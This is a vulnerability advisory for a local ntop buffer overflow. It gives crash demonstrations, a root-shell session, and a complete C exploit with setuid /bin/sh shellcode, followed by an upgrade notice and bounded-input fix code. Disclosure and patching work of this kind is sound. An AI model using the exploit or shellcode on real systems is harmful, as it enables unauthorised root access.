
Ntop Exploitable Buffer Overflow
Vulnerability

    ntop

Affected

    ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2

Description

    Christophe Bailleux found the following. All ntop versions are
    vulnerable to a local buffer overflow attack in their -i option.
    Ntop must be owned by root with the setuid bit set for the
    attacker to gain root privileges.

    a) ntop 1.1

        tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
        ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

        Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.1$

    b) ntop 1.2a7

        tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$

    c) ntop 1.3.1

        tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$

    d) ntop 1.3.2

        tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

        24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
        24/Oct/2000:12:32:16 Listening on
        [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
        24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
        24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
        24/Oct/2000:12:32:16 Initialising...
        Segmentation fault
        tshaw:/home/cb/ntop-1.3.2$

    The exploit was tested on Red Hat 6.2 (Zoot), where ntop is
    installed by default with the setuid root bit set:

        [cb@nux cb]$ cat /etc/redhat-release
        Red Hat Linux release 6.2 (Zoot)
        [cb@nux cb]$ rpm -qf /sbin/ntop
        ntop-1.1-1
        [cb@nux cb]$ id
        uid=535(cb) gid=535(cb) groups=535(cb)
        [cb@nux cb]$ ./expl

        ntop v.1.1 MT [i586-pc-linux-gnu] listening on
        ..............................

        Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
        bash#
        bash# id
        uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
        bash# exit
        [cb@nux cb]$

    Exploit:

    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    
    #define LEN 208
    
    int main (int argc, char **argv)
    {
      char buf[LEN + 12];
      int  ret = 0xbffffba0;
      int  *p;
    
      char code[]=
          "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
          "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
      if (argc > 1) {
        ret += atoi(argv[1]);
        fprintf(stderr, "Using ret %#010x\n", ret);
      }
    
      memset(buf, '\x90', LEN);
      memcpy(buf + LEN - strlen(code), code, strlen(code));
    
      p = (int *) (buf + LEN);
    
      *p++ = ret;
      *p++ = ret;
      *p   = 0;
    
     execl("./ntop", "ntop", "-i", buf, NULL);
    
    }

Solution

    Upgrade to latest version.
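
    The crashes above all come from an over-long -i argument. As an
    added example (not ntop source code, which this page does not
    show), the C program below accepts an interface name only if it
    fits a fixed buffer and contains expected characters; the name
    set_device and the allowed character set are assumptions.

```c
/* Added example: bounded handling of an interface-name argument.
 * set_device() and the allowed character set are assumptions for
 * illustration; this is not ntop source code. */
#include <net/if.h>   /* IF_NAMESIZE: POSIX limit incl. terminating NUL */
#include <stdio.h>
#include <string.h>

/* Copy arg into dst only if it fits and looks like a device name.
 * Returns 0 on success, -1 on rejection (dst is left untouched). */
int set_device(char dst[IF_NAMESIZE], const char *arg)
{
    const char *nul;
    size_t len, i;

    if (arg == NULL)
        return -1;
    /* Look for the terminator within the first IF_NAMESIZE bytes only,
     * so the length check never depends on how long the input is. */
    nul = memchr(arg, '\0', IF_NAMESIZE);
    if (nul == NULL || nul == arg)
        return -1;                      /* too long, or empty */
    len = (size_t)(nul - arg);
    for (i = 0; i < len; i++) {
        char c = arg[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') ||
                 c == '.' || c == '_' || c == '-' || c == ':';
        if (!ok)
            return -1;                  /* unexpected byte, e.g. 0x90 */
    }
    memcpy(dst, arg, len + 1);          /* len + 1 <= IF_NAMESIZE */
    return 0;
}

int main(int argc, char **argv)
{
    char device[IF_NAMESIZE];

    if (argc != 2 || set_device(device, argv[1]) != 0) {
        fprintf(stderr, "invalid interface name\n");
        return 1;                       /* fail closed before any use */
    }
    printf("listening on %s\n", device);
    return 0;
}
```

    Independently of the code fix, clearing the setuid bit on the
    installed binary removes the root privilege gain this advisory
    describes.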
